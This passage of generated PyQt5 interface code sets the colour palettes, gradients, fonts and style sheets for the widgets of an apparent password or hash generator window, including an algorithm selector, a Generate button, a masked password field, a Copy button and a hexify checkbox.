gradient.setColorAt(0.0, QtGui.QColor(255, 255, 255))
gradient.setColorAt(1.0, QtGui.QColor(136, 136, 136))
brush = QtGui.QBrush(gradient)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush)
self.Algorithms.setPalette(palette)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.Algorithms.setFont(font)
self.Algorithms.setStyleSheet("QComboBox {\n"
" color: #333;\n"
"\n"
" \n"
" border-style: outset;\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #888\n"
" );\n"
" padding: 5px;\n"
" \n"
" }\n"
"\n"
"\n"
"QComboBox:hover {\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #bbb\n"
" );\n"
" }\n"
"\n"
"QComboBox:pressed {\n"
" border-style: inset;\n"
" background: qradialgradient(\n"
" cx: 0.4, cy: -0.1, fx: 0.4, fy: -0.1,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #ddd\n"
" );\n"
" }\n"
"\n"
"\n"
"\n"
"\n"
"\n"
"\n"
"")
self.Algorithms.setObjectName("Algorithms")
self.Algorithms.addItem("")
self.Algorithms.addItem("")
self.Algorithms.addItem("")
self.Algorithms.addItem("")
self.Algorithms.addItem("")
self.Algorithms.addItem("")
self.Generate = QtWidgets.QPushButton(self.centralwidget)
self.Generate.setGeometry(QtCore.QRect(190, 120, 191, 41))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
gradient = QtGui.QRadialGradient(0.3, -0.4, 1.35, 0.3, -0.4)
gradient.setSpread(QtGui.QGradient.PadSpread)
gradient.setCoordinateMode(QtGui.QGradient.ObjectBoundingMode)
gradient.setColorAt(0.0, QtGui.QColor(255, 255, 255))
gradient.setColorAt(1.0, QtGui.QColor(136, 136, 136))
brush = QtGui.QBrush(gradient)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
gradient = QtGui.QRadialGradient(0.3, -0.4, 1.35, 0.3, -0.4)
gradient.setSpread(QtGui.QGradient.PadSpread)
gradient.setCoordinateMode(QtGui.QGradient.ObjectBoundingMode)
gradient.setColorAt(0.0, QtGui.QColor(255, 255, 255))
gradient.setColorAt(1.0, QtGui.QColor(136, 136, 136))
brush = QtGui.QBrush(gradient)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
gradient = QtGui.QRadialGradient(0.3, -0.4, 1.35, 0.3, -0.4)
gradient.setSpread(QtGui.QGradient.PadSpread)
gradient.setCoordinateMode(QtGui.QGradient.ObjectBoundingMode)
gradient.setColorAt(0.0, QtGui.QColor(255, 255, 255))
gradient.setColorAt(1.0, QtGui.QColor(136, 136, 136))
brush = QtGui.QBrush(gradient)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
gradient = QtGui.QRadialGradient(0.3, -0.4, 1.35, 0.3, -0.4)
gradient.setSpread(QtGui.QGradient.PadSpread)
gradient.setCoordinateMode(QtGui.QGradient.ObjectBoundingMode)
gradient.setColorAt(0.0, QtGui.QColor(255, 255, 255))
gradient.setColorAt(1.0, QtGui.QColor(136, 136, 136))
brush = QtGui.QBrush(gradient)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
gradient = QtGui.QRadialGradient(0.3, -0.4, 1.35, 0.3, -0.4)
gradient.setSpread(QtGui.QGradient.PadSpread)
gradient.setCoordinateMode(QtGui.QGradient.ObjectBoundingMode)
gradient.setColorAt(0.0, QtGui.QColor(255, 255, 255))
gradient.setColorAt(1.0, QtGui.QColor(136, 136, 136))
brush = QtGui.QBrush(gradient)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
gradient = QtGui.QRadialGradient(0.3, -0.4, 1.35, 0.3, -0.4)
gradient.setSpread(QtGui.QGradient.PadSpread)
gradient.setCoordinateMode(QtGui.QGradient.ObjectBoundingMode)
gradient.setColorAt(0.0, QtGui.QColor(255, 255, 255))
gradient.setColorAt(1.0, QtGui.QColor(136, 136, 136))
brush = QtGui.QBrush(gradient)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
gradient = QtGui.QRadialGradient(0.3, -0.4, 1.35, 0.3, -0.4)
gradient.setSpread(QtGui.QGradient.PadSpread)
gradient.setCoordinateMode(QtGui.QGradient.ObjectBoundingMode)
gradient.setColorAt(0.0, QtGui.QColor(255, 255, 255))
gradient.setColorAt(1.0, QtGui.QColor(136, 136, 136))
brush = QtGui.QBrush(gradient)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
gradient = QtGui.QRadialGradient(0.3, -0.4, 1.35, 0.3, -0.4)
gradient.setSpread(QtGui.QGradient.PadSpread)
gradient.setCoordinateMode(QtGui.QGradient.ObjectBoundingMode)
gradient.setColorAt(0.0, QtGui.QColor(255, 255, 255))
gradient.setColorAt(1.0, QtGui.QColor(136, 136, 136))
brush = QtGui.QBrush(gradient)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
gradient = QtGui.QRadialGradient(0.3, -0.4, 1.35, 0.3, -0.4)
gradient.setSpread(QtGui.QGradient.PadSpread)
gradient.setCoordinateMode(QtGui.QGradient.ObjectBoundingMode)
gradient.setColorAt(0.0, QtGui.QColor(255, 255, 255))
gradient.setColorAt(1.0, QtGui.QColor(136, 136, 136))
brush = QtGui.QBrush(gradient)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush)
self.Generate.setPalette(palette)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.Generate.setFont(font)
self.Generate.setStyleSheet("QPushButton {\n"
" color: #333;\n"
"\n"
" border-radius: 20px;\n"
" border-style: outset;\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #888\n"
" );\n"
" padding: 5px;\n"
" }\n"
"\n"
"QPushButton:hover {\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #bbb\n"
" );\n"
" }\n"
"\n"
"QPushButton:pressed {\n"
" border-style: inset;\n"
" background: qradialgradient(\n"
" cx: 0.4, cy: -0.1, fx: 0.4, fy: -0.1,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #ddd\n"
" );\n"
" }")
self.Generate.setObjectName("Generate")
self.UserInput = QtWidgets.QLineEdit(self.centralwidget)
self.UserInput.setGeometry(QtCore.QRect(190, 20, 191, 31))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush)
self.UserInput.setPalette(palette)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.UserInput.setFont(font)
self.UserInput.setObjectName("UserInput")
self.Password = QtWidgets.QLineEdit(self.centralwidget)
self.Password.setGeometry(QtCore.QRect(200, 210, 141, 31))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush)
self.Password.setPalette(palette)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.Password.setFont(font)
self.Password.setText("")
self.Password.setEchoMode(QtWidgets.QLineEdit.Password)
self.Password.setReadOnly(True)
self.Password.setObjectName("Password")
self.HideShow = QtWidgets.QPushButton(self.centralwidget)
self.HideShow.setGeometry(QtCore.QRect(350, 210, 31, 31))
self.HideShow.setStyleSheet("QPushButton {\n"
" color: #333;\n"
"\n"
" border-radius: 7px;\n"
" border-style: outset;\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #888\n"
" );\n"
" padding: 5px;\n"
" }\n"
"\n"
"QPushButton:hover {\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #bbb\n"
" );\n"
" }\n"
"\n"
"QPushButton:pressed {\n"
" border-style: inset;\n"
" background: qradialgradient(\n"
" cx: 0.4, cy: -0.1, fx: 0.4, fy: -0.1,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #ddd\n"
" );\n"
" }")
self.HideShow.setText("")
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap("../../Desktop/EYECLOSE.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.HideShow.setIcon(icon)
self.HideShow.setIconSize(QtCore.QSize(30, 30))
self.HideShow.setObjectName("HideShow")
self.Copy = QtWidgets.QPushButton(self.centralwidget)
self.Copy.setGeometry(QtCore.QRect(190, 250, 201, 31))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
gradient = QtGui.QRadialGradient(0.3, -0.4, 1.35, 0.3, -0.4)
gradient.setSpread(QtGui.QGradient.PadSpread)
gradient.setCoordinateMode(QtGui.QGradient.ObjectBoundingMode)
gradient.setColorAt(0.0, QtGui.QColor(255, 255, 255))
gradient.setColorAt(1.0, QtGui.QColor(136, 136, 136))
brush = QtGui.QBrush(gradient)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
gradient = QtGui.QRadialGradient(0.3, -0.4, 1.35, 0.3, -0.4)
gradient.setSpread(QtGui.QGradient.PadSpread)
gradient.setCoordinateMode(QtGui.QGradient.ObjectBoundingMode)
gradient.setColorAt(0.0, QtGui.QColor(255, 255, 255))
gradient.setColorAt(1.0, QtGui.QColor(136, 136, 136))
brush = QtGui.QBrush(gradient)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
gradient = QtGui.QRadialGradient(0.3, -0.4, 1.35, 0.3, -0.4)
gradient.setSpread(QtGui.QGradient.PadSpread)
gradient.setCoordinateMode(QtGui.QGradient.ObjectBoundingMode)
gradient.setColorAt(0.0, QtGui.QColor(255, 255, 255))
gradient.setColorAt(1.0, QtGui.QColor(136, 136, 136))
brush = QtGui.QBrush(gradient)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
gradient = QtGui.QRadialGradient(0.3, -0.4, 1.35, 0.3, -0.4)
gradient.setSpread(QtGui.QGradient.PadSpread)
gradient.setCoordinateMode(QtGui.QGradient.ObjectBoundingMode)
gradient.setColorAt(0.0, QtGui.QColor(255, 255, 255))
gradient.setColorAt(1.0, QtGui.QColor(136, 136, 136))
brush = QtGui.QBrush(gradient)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
gradient = QtGui.QRadialGradient(0.3, -0.4, 1.35, 0.3, -0.4)
gradient.setSpread(QtGui.QGradient.PadSpread)
gradient.setCoordinateMode(QtGui.QGradient.ObjectBoundingMode)
gradient.setColorAt(0.0, QtGui.QColor(255, 255, 255))
gradient.setColorAt(1.0, QtGui.QColor(136, 136, 136))
brush = QtGui.QBrush(gradient)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
gradient = QtGui.QRadialGradient(0.3, -0.4, 1.35, 0.3, -0.4)
gradient.setSpread(QtGui.QGradient.PadSpread)
gradient.setCoordinateMode(QtGui.QGradient.ObjectBoundingMode)
gradient.setColorAt(0.0, QtGui.QColor(255, 255, 255))
gradient.setColorAt(1.0, QtGui.QColor(136, 136, 136))
brush = QtGui.QBrush(gradient)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
gradient = QtGui.QRadialGradient(0.3, -0.4, 1.35, 0.3, -0.4)
gradient.setSpread(QtGui.QGradient.PadSpread)
gradient.setCoordinateMode(QtGui.QGradient.ObjectBoundingMode)
gradient.setColorAt(0.0, QtGui.QColor(255, 255, 255))
gradient.setColorAt(1.0, QtGui.QColor(136, 136, 136))
brush = QtGui.QBrush(gradient)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
gradient = QtGui.QRadialGradient(0.3, -0.4, 1.35, 0.3, -0.4)
gradient.setSpread(QtGui.QGradient.PadSpread)
gradient.setCoordinateMode(QtGui.QGradient.ObjectBoundingMode)
gradient.setColorAt(0.0, QtGui.QColor(255, 255, 255))
gradient.setColorAt(1.0, QtGui.QColor(136, 136, 136))
brush = QtGui.QBrush(gradient)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
gradient = QtGui.QRadialGradient(0.3, -0.4, 1.35, 0.3, -0.4)
gradient.setSpread(QtGui.QGradient.PadSpread)
gradient.setCoordinateMode(QtGui.QGradient.ObjectBoundingMode)
gradient.setColorAt(0.0, QtGui.QColor(255, 255, 255))
gradient.setColorAt(1.0, QtGui.QColor(136, 136, 136))
brush = QtGui.QBrush(gradient)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(51, 51, 51, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush)
self.Copy.setPalette(palette)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.Copy.setFont(font)
self.Copy.setStyleSheet("QPushButton {\n"
" color: #333;\n"
" \n"
" border-radius: 13px;\n"
" border-style: outset;\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #888\n"
" );\n"
" padding: 5px;\n"
" }\n"
"\n"
"QPushButton:hover {\n"
" background: qradialgradient(\n"
" cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #bbb\n"
" );\n"
" }\n"
"\n"
"QPushButton:pressed {\n"
" border-style: inset;\n"
" background: qradialgradient(\n"
" cx: 0.4, cy: -0.1, fx: 0.4, fy: -0.1,\n"
" radius: 1.35, stop: 0 #fff, stop: 1 #ddd\n"
" );\n"
" }")
self.Copy.setObjectName("Copy")
self.hexify = QtWidgets.QCheckBox(self.centralwidget)
self.hexify.setGeometry(QtCore.QRect(250, 180, 81, 21))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(84, 84, 84))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush)
self.hexify.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(12)
font.setBold(True)
font.setWeight(75)
self.hexify.setFont(font)
self.hexify.setObjectName("hexify")
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 577, 21))
self.menubar.setObjectName("menubar")
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
